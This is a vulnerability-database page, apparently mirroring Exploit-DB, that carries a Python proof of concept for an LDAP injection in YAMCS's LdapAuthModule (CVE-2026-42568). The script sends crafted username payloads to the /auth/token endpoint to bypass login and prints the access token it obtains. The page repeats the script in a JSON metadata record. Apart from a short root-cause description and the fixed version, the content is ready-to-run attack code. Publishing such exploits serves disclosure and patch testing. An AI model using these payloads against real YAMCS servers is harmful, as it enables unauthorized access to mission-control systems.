YAMCS yamcs-core 5.12.7 – LDAP Injection_EDB-ID:52603

Description

Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https://yamcs.org Software Link: https://github.com/yamcs/yamcs Version: 1 else "http://localhost:8090" base =...

Visit Original Source

Basic Information

ID EDB-ID:52603

Published May 30, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-42568
# Category: Remote / Auth Bypass
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j

#!/usr/bin/env python3
"""
CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule
=========================================================
The username parameter in LdapAuthModule is inserted directly
into LDAP search filters without RFC 4515 escaping.

Root cause (LdapAuthModule.java):
var filter = userFilter.replace("{0}", username);

With userFilter=(uid={0}) and username=*)(uid=*))(|(uid=*
Result: (uid=*)(uid=*))(|(uid=*) — universal match, auth bypass.

Only affects instances with LdapAuthModule configured.
=========================================================
"""

import requests
import sys
import json

def main():
target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
base = target.rstrip("/")

print("=" * 65)
print(" CVE-2026-42568 — YAMCS LDAP Injection PoC")
print(f" Target: {target}")
print(" Requires: LdapAuthModule configured in yamcs.yaml")
print("=" * 65)

payloads = [
{
"name": "Universal bypass",
"username": "*)(uid=*))(|(uid=*",
"password": "anything",
},
{
"name": "Targeted bypass (admin)",
"username": "admin)(|(objectClass=*",
"password": "wrongpassword",
},
{
"name": "Wildcard match",
"username": "op*",
"password": "anything",
}
]

for i, p in enumerate(payloads, 1):
print(f"\n[{i}] {p['name']}")
print(f" username: {p['username']}")
print(f" password: {p['password']}")

try:
resp = requests.post(f"{base}/auth/token",
data={
"grant_type": "password",
"username": p["username"],
"password": p["password"]
}, timeout=5)

print(f" HTTP: {resp.status_code}")

if resp.status_code == 200:
token = resp.json().get("access_token", "")
print(f" [!!!] AUTH BYPASSED")
if token:
print(f" [!!!] Token: {token[:50]}...")
elif resp.status_code == 401:
print(f" [-] 401 — LDAP may not be configured")
elif resp.status_code == 403:
print(f" [+] 403 — Patched or LDAP disabled")

except requests.exceptions.ConnectionError:
print(f" [-] Connection refused — is YAMCS running?")
except Exception as e:
print(f" [-] Error: {e}")

print("\n" + "=" * 65)
print(" Fix: Upgrade to yamcs-core >= 5.12.7")
print("=" * 65)

if __name__ == "__main__":
main()

{
    "lastseen": "2026-05-30T15:32:49",
    "description": "Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https://yamcs.org Software Link: https://github.com/yamcs/yamcs Version: 1 else \"http://localhost:8090\" base =...",
    "published": "2026-05-30T00:00:00",
    "modified": "2026-05-30T00:00:00",
    "type": "exploitdb",
    "title": "YAMCS yamcs-core  5.12.7 - LDAP Injection",
    "source": "",
    "references": "",
    "id": "EDB-ID:52603",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-42568"
    ],
    "sourceData": "# Exploit Title: YAMCS yamcs-core  5.12.7 - LDAP Injection \r\n# Date: 2026-05-27\r\n# Exploit Author: Daniel Miranda Barcelona (Excal1bur)\r\n# Vendor Homepage: https://yamcs.org\r\n# Software Link: https://github.com/yamcs/yamcs\r\n# Version: < 5.12.7\r\n# Tested on: Linux\r\n# CVE: CVE-2026-42568\r\n# Category: Remote / Auth Bypass\r\n# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j\r\n\r\n#!/usr/bin/env python3\r\n\"\"\"\r\nCVE-2026-42568 \u2014 YAMCS LDAP Injection in LdapAuthModule\r\n=========================================================\r\nThe username parameter in LdapAuthModule is inserted directly\r\ninto LDAP search filters without RFC 4515 escaping.\r\n\r\nRoot cause (LdapAuthModule.java):\r\n    var filter = userFilter.replace(\"{0}\", username);\r\n\r\nWith userFilter=(uid={0}) and username=*)(uid=*))(|(uid=*\r\nResult: (uid=*)(uid=*))(|(uid=*) \u2014 universal match, auth bypass.\r\n\r\nOnly affects instances with LdapAuthModule configured.\r\n=========================================================\r\n\"\"\"\r\n\r\nimport requests\r\nimport sys\r\nimport json\r\n\r\ndef main():\r\n    target = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:8090\"\r\n    base = target.rstrip(\"/\")\r\n\r\n    print(\"=\" * 65)\r\n    print(\" CVE-2026-42568 \u2014 YAMCS LDAP Injection PoC\")\r\n    print(f\" Target: {target}\")\r\n    print(\" Requires: LdapAuthModule configured in yamcs.yaml\")\r\n    print(\"=\" * 65)\r\n\r\n    payloads = [\r\n        {\r\n            \"name\": \"Universal bypass\",\r\n            \"username\": \"*)(uid=*))(|(uid=*\",\r\n            \"password\": \"anything\",\r\n        },\r\n        {\r\n            \"name\": \"Targeted bypass (admin)\",\r\n            \"username\": \"admin)(|(objectClass=*\",\r\n            \"password\": \"wrongpassword\",\r\n        },\r\n        {\r\n            \"name\": \"Wildcard match\",\r\n            \"username\": \"op*\",\r\n            \"password\": \"anything\",\r\n        }\r\n    ]\r\n\r\n    for i, p in enumerate(payloads, 1):\r\n        print(f\"\\n[{i}] {p['name']}\")\r\n        print(f\"     username: {p['username']}\")\r\n        print(f\"     password: {p['password']}\")\r\n\r\n        try:\r\n            resp = requests.post(f\"{base}/auth/token\",\r\n                data={\r\n                    \"grant_type\": \"password\",\r\n                    \"username\": p[\"username\"],\r\n                    \"password\": p[\"password\"]\r\n                }, timeout=5)\r\n\r\n            print(f\"     HTTP:     {resp.status_code}\")\r\n\r\n            if resp.status_code == 200:\r\n                token = resp.json().get(\"access_token\", \"\")\r\n                print(f\"     [!!!] AUTH BYPASSED\")\r\n                if token:\r\n                    print(f\"     [!!!] Token: {token[:50]}...\")\r\n            elif resp.status_code == 401:\r\n                print(f\"     [-] 401 \u2014 LDAP may not be configured\")\r\n            elif resp.status_code == 403:\r\n                print(f\"     [+] 403 \u2014 Patched or LDAP disabled\")\r\n\r\n        except requests.exceptions.ConnectionError:\r\n            print(f\"     [-] Connection refused \u2014 is YAMCS running?\")\r\n        except Exception as e:\r\n            print(f\"     [-] Error: {e}\")\r\n\r\n    print(\"\\n\" + \"=\" * 65)\r\n    print(\" Fix: Upgrade to yamcs-core >= 5.12.7\")\r\n    print(\"=\" * 65)\r\n\r\nif __name__ == \"__main__\":\r\n    main()",
    "sourceHref": "https://www.exploit-db.com/raw/52603",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52603",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply